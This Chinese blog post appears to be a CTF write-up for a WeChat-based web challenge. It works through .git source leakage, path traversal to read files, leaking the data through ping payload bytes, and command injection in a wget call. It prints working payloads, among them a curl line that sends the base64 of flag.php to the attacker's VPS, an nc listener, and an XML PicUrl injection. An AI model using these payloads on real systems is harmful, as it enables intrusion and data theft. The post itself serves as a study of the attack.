sky's blog

DC0531-web

字数统计: 2,590阅读时长: 13 min
2018/06/20 Share

前言

今天恰好放假,遇到一个比赛,发现了一个比较有意思的题目,于是做了一下总结,于是有了这篇文章

题目大体流程

题目首先给出一个公众号,本以为是一个签到题,没想到成为全场比赛我认为质量最高的题目。。。
当然比赛的时候本人很菜,没有做出,赛后进行了复现,感谢C26大佬的writeup。
首先是关注微信公众号,然后我们按照提示操作

依次使用后,并没有发现有用的点
并且shoot a target (s:xxx)十分瞩目
因为我们不知道攻击对象,全靠猜
后来发现竟然是跟一个ip

随后上了我的vps,想尝试让题目访问我的vps
结果发现日志是看不到的,这里就猜测到可能使用了ping这样的命令
最初的想法是用ceye的dns log查看访问记录
结果发现不能指定域名,例如:

1
s:skysec.top

这样是被过滤的,刚开始我是想找到我的ceye的ip:port
但是发现好像依旧不能收到dns log = =
于是我只能想办法在自己的服务器上进行流量捕捉
最好方法应该就是tcpdump了,方便快捷
首先上vps查看网卡

1
ifconfig

发现网卡为eth0
然后利用tcpdump抓取这个网卡的icmp包

1
tcpdump -i eth0 icmp

发现果然抓到了ping的请求

得到目标ip为

1
139.198.3.171

然后对目标ip进行探测
发现存在.git泄露

利用工具将源码下载下来,进行审计

攻击思路思考

发现关键控制器

1
139.198.3.171/Application/Home/Controller/TestController.class.php

关键代码如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
$msg = $wechat->serve();
$this->username = $msg->FromUserName;
$this->real_path = $this->tmp_path . md5($this->salt . $this->username);
if(!is_dir($this->real_path)){
mkdir($this->real_path);
system('cp ./Public/* '.$this->real_path);
$this->info['weapon'] = 'fist';
$this->info['status'] = 100;
$this->info['bullet'] = substr(base64_encode(file_get_contents($this->real_path.'/'.$this->info['weapon'])),0,100);

}else{
$this->info = json_decode(file_get_contents($this->real_path . '/info'),TRUE);
}


// 回复文本消息
if ($msg->MsgType == 'text') {
if(!strstr($msg->Content,':')){
$wechat->reply($this->menu());
}else{
$tmp = explode(':' , $msg->Content);
$func = $tmp[0];
$arg = $tmp[1];
switch ($func) {
case 'f':
$wechat->reply($this->f());
break;
case 'p':
$wechat->reply($this->p($arg));
break;
case 'r':
$wechat->reply($this->r());
break;
case 's':
$wechat->reply($this->s($arg));
break;
case 'c':
$wechat->reply($this->c());
break;
case 'sh':
$wechat->reply($this->sh());
default:
$wechat->reply("Unsupported method!\n");
break;
}
}

}else if($msg->MsgType == 'image') {
$wechat->reply($this->u($msg->PicUrl));
}else{
$wechat->reply("Unsupported message type!\n");
}

// store user info
file_put_contents($this->real_path . '/info' , json_encode($this->info));
}

public function menu(){
$menu = '';
$menu .= "Welcome to Hence's unknown battle ground!\n";
$menu .= "you have following options to utilize:\n";
$menu .= "1. find a weapon (f:)\n";
$menu .= "2. pick up a weapon (for instance: p:kar98)\n";
$menu .= "3. reload a weapon (r:)\n";
$menu .= "4. shoot a target (s:xxx)\n";
$menu .= "5. check ur weapon's status (c:)\n";
$menu .= "6. upload ur weapon (just upload image-file)\n";
$menu .= "7. show ur weapon (sh:)\n";
return $menu;

}

public function f(){
$res = "Here are your weapons:\n";

foreach (scandir($this->real_path) as $value) {
if($value != '.' && $value != '..' && $value != 'info'){
$res .= $value . "\n";
array_push($this->all_weapons,$value);
}
}
return $res;
}

public function p($weapon){
$res = "";
if(!is_file($this->real_path . '/' . $weapon)){
$res = "No such weapon! U bitch!\n";
}else{
$this->info['weapon'] = $weapon;
$this->info['bullet'] = substr(base64_encode(file_get_contents($this->real_path . '/' . $this->info['weapon'])),0,100);
// no bullets initially
$this->info['status'] = 0;
$res = "You have changed ur weapon to " . $weapon . "\n";
}
return $res;
}

public function r(){
$res = "";
$this->info['status'] = 100;
$res = "Reload OK!";
return $res;
}

public function s($target){
$res = "";
if(!preg_match('/^(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|\d)(?:[.](?:25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|\d)){3}$/', $target)){
$res = "This is not a target! R U kidding?\n";
}else{
// make sure u have bullets
if($this->info['status']>0){
$this->info['status'] = $this->info['status'] - 1;
$bullet = $this->info['bullet'][100 - $this->info['status']];
system("ping -c 1 -W 1 -p '" . bin2hex($bullet) ."' ".$target . " 2>&1 1>/dev/null");
$res = "You hit it once!\n";
}else{
$res = "You have run out of bullets\n";
}
}
return $res;
}

public function c(){
$res = "Ur weapon is " . $this->info['weapon'] . "\n";
$res .= $this->info['status'] . " bullet(s) left\n";
return $res;
}

public function u($PicUrl){
shell_exec("wget " . $PicUrl . " -O " . $this->real_path . '/' . $this->info['weapon']." 2>&1 1>/dev/null");
return "Update your weapon successfully!";
}

public function sh()
{
return "Sorry, not support yet!\n";
}

}

通读全部代码,关注点停留在如下几个函数

1
2
3
4
5
6
7
8
9
10
11
12
13
public function p($weapon){
$res = "";
if(!is_file($this->real_path . '/' . $weapon)){
$res = "No such weapon! U bitch!\n";
}else{
$this->info['weapon'] = $weapon;
$this->info['bullet'] = substr(base64_encode(file_get_contents($this->real_path . '/' . $this->info['weapon'])),0,100);
// no bullets initially
$this->info['status'] = 0;
$res = "You have changed ur weapon to " . $weapon . "\n";
}
return $res;
}

可以清楚看到,这个函数中有读文件操作

1
$this->info['bullet'] = substr(base64_encode(file_get_contents($this->real_path . '/' . $this->info['weapon'])),0,100);

并且由于$weapon可控,这里完全可以在知道绝对路径的情况下进行目录穿越和任意文件读取
但是关于$this->info['bullet']的输出点,我们后续再看
然后是命令执行的一个函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
public function s($target){
$res = "";
if(!preg_match('/^(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|\d)(?:[.](?:25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|\d)){3}$/', $target)){
$res = "This is not a target! R U kidding?\n";
}else{
// make sure u have bullets
if($this->info['status']>0){
$this->info['status'] = $this->info['status'] - 1;
$bullet = $this->info['bullet'][100 - $this->info['status']];
system("ping -c 1 -W 1 -p '" . bin2hex($bullet) ."' ".$target . " 2>&1 1>/dev/null");
$res = "You hit it once!\n";
}else{
$res = "You have run out of bullets\n";
}
}
return $res;
}

这里想直接利用system非常困难,因为$target被过滤,而$bullet已经被转为16进制,需要进行组合攻击
以及另一个命令执行点

1
2
3
4
public function u($PicUrl){
shell_exec("wget " . $PicUrl . " -O " . $this->real_path . '/' . $this->info['weapon']." 2>&1 1>/dev/null");
return "Update your weapon successfully!";
}

这里相对来说,$PicUrl没有过滤,如果能够伪造,则可以命令执行
那么我们依次分析这两种攻击

利用ping进行任意文件读取

回到最初的文件读取

1
2
3
4
5
6
7
8
9
10
11
12
13
public function p($weapon){
$res = "";
if(!is_file($this->real_path . '/' . $weapon)){
$res = "No such weapon! U bitch!\n";
}else{
$this->info['weapon'] = $weapon;
$this->info['bullet'] = substr(base64_encode(file_get_contents($this->real_path . '/' . $this->info['weapon'])),0,100);
// no bullets initially
$this->info['status'] = 0;
$res = "You have changed ur weapon to " . $weapon . "\n";
}
return $res;
}

我们尝试目录穿越

1
p:../../../../../../etc/passwd

得到回显

1
You have changed ur weapon to ../../../../../../etc/passwd

但是如果我们发送

1
p:../../../../../../test

则会收到

1
No such weapon! U bitch!


这里就和代码完全吻合了
如果我们构造的目录穿越后的目录存在,则会成功file_get_contents()
而如果目录不存在,则会提示
而我们根据git泄露的代码知道,flag.php位置应该在

1
/var/www/html/flag.php

我们尝试读取

发现可以成功改变
那么下一个问题就是如何将读取的内容打出来
我们观察到这个函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
public function s($target){
$res = "";
if(!preg_match('/^(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|\d)(?:[.](?:25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|\d)){3}$/', $target)){
$res = "This is not a target! R U kidding?\n";
}else{
// make sure u have bullets
if($this->info['status']>0){
$this->info['status'] = $this->info['status'] - 1;
$bullet = $this->info['bullet'][100 - $this->info['status']];
system("ping -c 1 -W 1 -p '" . bin2hex($bullet) ."' ".$target . " 2>&1 1>/dev/null");
$res = "You hit it once!\n";
}else{
$res = "You have run out of bullets\n";
}
}
return $res;
}

如之前提及,去bypass $target实现任意命令执行显然比较困难
但这里我们可以发现

1
system("ping -c 1 -W 1 -p '" . bin2hex($bullet) ."' ".$target . " 2>&1 1>/dev/null");

在系统执行ping命令的时候会带出$bullet的数据
而$bullet的来源则是:

1
$bullet = $this->info['bullet'][100 - $this->info['status']];

正是我们之前任意文件读取的值info['bullet']
于是我们选择抓取icmp包,并查看详情

1
tcpdump -i eth0 icmp -nn -XX -vvv


当然这也看很难受,我们将其重定向到文本里

1
tcpdump -i eth0 icmp -nn -XX -vvv > tcpdump.txt

然后我们去公众号疯狂请求s:vpsip
然后将tcpdump.txt稍作处理

不难看出所有的icmp包携带了base64
我们将其导出合并得到

1
D9waHAKJGZsYWcgPSAiREMwNTMxe1dlY2hBdF9Jc19Tb19DMG9sfSI7Cg==

但是直接解码是不能成功的,我们随便补上一位

成功得到flag

1
DC0531{WechAt_Is_So_C0ol}

RCE-方法1

我们可以看到如下代码

1
2
3
4
 public function u($PicUrl){
shell_exec("wget " . $PicUrl . " -O " . $this->real_path . '/' . $this->info['weapon']." 2>&1 1>/dev/null");
return "Update your weapon successfully!";
}

这里是我最开始做题的时候的想法
但是这里的$PicUrl若想可控,需要过前面的判断

1
2
3
4
5
else if($msg->MsgType == 'image') {
$wechat->reply($this->u($msg->PicUrl));
}else{
$wechat->reply("Unsupported message type!\n");
}

这里想到的第一件事就是抓包,但是微信抓包显然不太容易
后来才想到,可以利用thinkphp的路由调用

1
http://139.198.3.171/?c=test&a=u&PicUrl=;curl vpsip:8888/`whoami`

这里c代表controller,a代表action
而我们选择testcontroller和u函数触发代码
然后再vps上监听

1
nc -l -vv 8888

即可收到回显

获取flag

1
http://139.198.3.171/?c=test&a=u&PicUrl=;curl vpsip:8888/`cat%20/var/www/html/flag.php%20|%20base64`

得到flag

1
PD9waHAKJGZsYWcgPSAiREMwNTMxe1dlY2hBdF9Jc19Tb19DMG9sfSI7Cg==

RCE-方法2

法2类似强网杯的wechat那题

1
https://www.cnblogs.com/iamstudy/articles/2th_qiangwangbei_ctf_writeup.html

查看sdk,然后构造xml注入攻击
这里也是通过c26大佬的题解才有所了解
文件路径如下

1
ThinkPHP/Library/Gaoming13/WechatPhpSdk/Wechat.class.php


1
public function reply($msg)

可以看到如下代码

1
2
3
4
5
6
7
8
9
10
11
12
13
case 'text_simple':
$xml = sprintf('<xml>'.
'<ToUserName><![CDATA[%s]]></ToUserName>'.
'<FromUserName><![CDATA[%s]]></FromUserName>'.
'<CreateTime>%s</CreateTime>'.
'<MsgType><![CDATA[text]]></MsgType>'.
'<Content><![CDATA[%s]]></Content>'.
'</xml>',
$this->message->FromUserName,
$this->message->ToUserName,
time(),
$msg);
break;

可以大概对xml的格式有个了解
剩下的就是构造了
大致如下

1
2
3
4
5
6
7
8
<xml>
<ToUserName>2</ToUserName>
<FromUserName>1</FromUserName>
<CreateTime>1529256180</CreateTime>
<MsgType>image</MsgType>
<Content><![CDATA[123]]></Content>
<PicUrl>;{cmd};</PicUrl>
</xml>

然后就是利用现有代码和泄露的key进行签名,伪造攻击,就不再赘述
注:
git泄露的token并不是真实的
这里也是c26大佬发现了文件泄露

1
http://139.198.3.171/Application/Home/Controller/TestController.class.php.bak

后记

感谢师傅们赛后的交流,让我涨了不少姿势,感谢OTZ

点击赞赏二维码,您的支持将鼓励我继续创作!
CATALOG
  1. 1. 前言
  2. 2. 题目大体流程
  3. 3. 攻击思路思考
  4. 4. 利用ping进行任意文件读取
  5. 5. RCE-方法1
  6. 6. RCE-方法2
  7. 7. 后记